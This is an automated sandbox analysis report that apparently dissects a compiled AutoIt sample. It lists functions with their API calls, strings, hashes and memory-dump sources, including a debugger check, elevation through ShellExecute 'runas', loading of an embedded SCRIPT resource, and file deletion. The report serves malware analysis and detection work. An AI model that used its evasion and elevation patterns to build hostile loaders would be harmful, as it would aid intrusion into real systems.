Opcode ID: 1628b36fe1eeb20d470e67bc4b7b69b220eec050dcf40fb335ee9ca24f967d24
Instruction ID: 7b3a42f20b837f38c0469a9a6cf1f6ce76820cb60271852b3cd27584a12d9d95
Opcode Fuzzy Hash: 1628b36fe1eeb20d470e67bc4b7b69b220eec050dcf40fb335ee9ca24f967d24
Instruction Fuzzy Hash: A9C13330A5C34CAADA3557E7CF09BB67A30AB61770F4C0A56F756CA0F3D7259C089622

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
IsDebuggerPresent.KERNEL32 ref: 00403B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346

Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41

Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415

Strings

This is a third-party compiled AutoIt script., xrefs: 0043D279
runas, xrefs: 0043D33A
%I, xrefs: 00403C44

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%I
API String ID: 529118366-2806069697
Opcode ID: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
Opcode Fuzzy Hash: 255f10e69cc8df1980d2df773c135a78c85689e8f31627855df614f078967646
Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004049CD

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
IsWow64Process.KERNEL32(00000000), ref: 00404AA1
GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
FreeLibrary.KERNEL32(00000000), ref: 00404AF2
GetSystemInfo.KERNEL32(00000000), ref: 00404B23
GetSystemInfo.KERNEL32(00000000), ref: 00404B2F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F

Strings

SCRIPT, xrefs: 00404EA6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665

Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

pbL, xrefs: 004449B9
%I, xrefs: 0040FCF3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbL$%I
API String ID: 3964851224-1578263234
Opcode ID: 5321aa7f729078112e1a8cb17c6e91a84e62c12b251cb334e246fbbf78442dc2
Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
Opcode Fuzzy Hash: 5321aa7f729078112e1a8cb17c6e91a84e62c12b251cb334e246fbbf78442dc2
Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A

Function 0040E6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

DdL, xrefs: 00443B2E
DdL, xrefs: 0040EAC1
Variable must be of type 'Object'., xrefs: 00443E62
DdL, xrefs: 00443AF5
DdL, xrefs: 0040EABA

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.
API String ID: 0-2838938394
Opcode ID: 216d59986b7a2487fa6f354ae55519cfe1a1ed330bd6ff28f20c9bafdc192041
Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
Opcode Fuzzy Hash: 216d59986b7a2487fa6f354ae55519cfe1a1ed330bd6ff28f20c9bafdc192041
Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99

Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
FindFirstFileW.KERNEL32(?,?), ref: 0046447B
FindClose.KERNEL32(00000000), ref: 0046448B

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F

Function 004109D0 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
timeGetTime.WINMM ref: 00410D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
Sleep.KERNEL32(0000000A), ref: 00410E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
DestroyWindow.USER32 ref: 00410F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
TranslateMessage.USER32(?), ref: 00445C60
DispatchMessageW.USER32(?), ref: 00445C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82

Strings

@GUI_WINHANDLE, xrefs: 00444F8F
@COM_EVENTOBJ, xrefs: 004454F0
@TRAY_ID, xrefs: 0044578F
pbL, xrefs: 00444F59
pbL, xrefs: 004457B4
@GUI_CTRLID, xrefs: 00444F3A
pbL, xrefs: 00445003
@GUI_CTRLHANDLE, xrefs: 00444FE4
pbL, xrefs: 00444FAE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pbL$pbL$pbL$pbL
API String ID: 4212290369-1082885916
Opcode ID: 5cd4ae3c9f6798d911215eb667310f40c9432597e2690efffbf37d820f254686
Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
Opcode Fuzzy Hash: 5cd4ae3c9f6798d911215eb667310f40c9432597e2690efffbf37d820f254686
Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A

Function 00AF8550 Relevance: 21.5, APIs: 14, Instructions: 538COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00AF7FD4
FreeSid.ADVAPI32(?), ref: 00AF8579

Memory Dump Source

Source File: 00000000.00000002.1408264425.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorFreeLast
String ID:
API String ID: 1762890227-0
Opcode ID: 1925c0039ca89a92d4e05405478181261c453e02d1e22d2a5e9407addf08681f
Instruction ID: 50d86d38a1dcc410abc1380822126ca8dfcdbf6b8ad31de65965120bd54566d2
Opcode Fuzzy Hash: 1925c0039ca89a92d4e05405478181261c453e02d1e22d2a5e9407addf08681f
Instruction Fuzzy Hash: F1F1292190D34D6EDB3647E88C0977A2AA06F62770F9C0786F791CA1F2DE6C9C05D226

Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

__wsplitpath.LIBCMT ref: 00469234

Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B

_wcscpy.LIBCMT ref: 00469247
_wcscat.LIBCMT ref: 0046925A
__wsplitpath.LIBCMT ref: 0046927F
_wcscat.LIBCMT ref: 00469295
_wcscat.LIBCMT ref: 004692A8

Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED

_wcscmp.LIBCMT ref: 004691EF

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
_wcsncpy.LIBCMT ref: 004694C5
DeleteFileW.KERNEL32(?,?), ref: 004694FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
Opcode Fuzzy Hash: 7c8db0594681c6f417e1ac50839a222e05dbd96a0456b52a488688be3988f024
Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

AutoIt v3 GUI, xrefs: 00403090
TaskbarCreated, xrefs: 004030A4
0, xrefs: 00403056
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

AutoIt v3 GUI, xrefs: 00403090
TaskbarCreated, xrefs: 004030A4
0, xrefs: 00403056
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724

Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
RegCloseKey.ADVAPI32(?), ref: 0043E947
_wcscat.LIBCMT ref: 0043E9A0

Strings

\, xrefs: 0043E9C3
Software\AutoIt v3\AutoIt, xrefs: 0040719E
Include, xrefs: 0043E8BF, 0043E900
\Include\, xrefs: 00407165

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 0bd69d56175447a29ebb382315097688d47d2fce8c852b44038c254da5b7497a
Instruction ID: d25a402f486e77f999364444344266e14871576642d40cf04fb282302ec68e46
Opcode Fuzzy Hash: 0bd69d56175447a29ebb382315097688d47d2fce8c852b44038c254da5b7497a
Instruction Fuzzy Hash: E9718E71509301AEC340EF26E841D5BBBE8FF88314F51893FF445972A1DB79A948CB5A

Function 00403633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 004036D2
KillTimer.USER32(?,00000001), ref: 004036FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0040371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0040372A
CreatePopupMenu.USER32 ref: 0040373E
PostQuitMessage.USER32(00000000), ref: 0040374D

Strings

TaskbarCreated, xrefs: 00403725
%I, xrefs: 0043D081, 0043D0CF

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
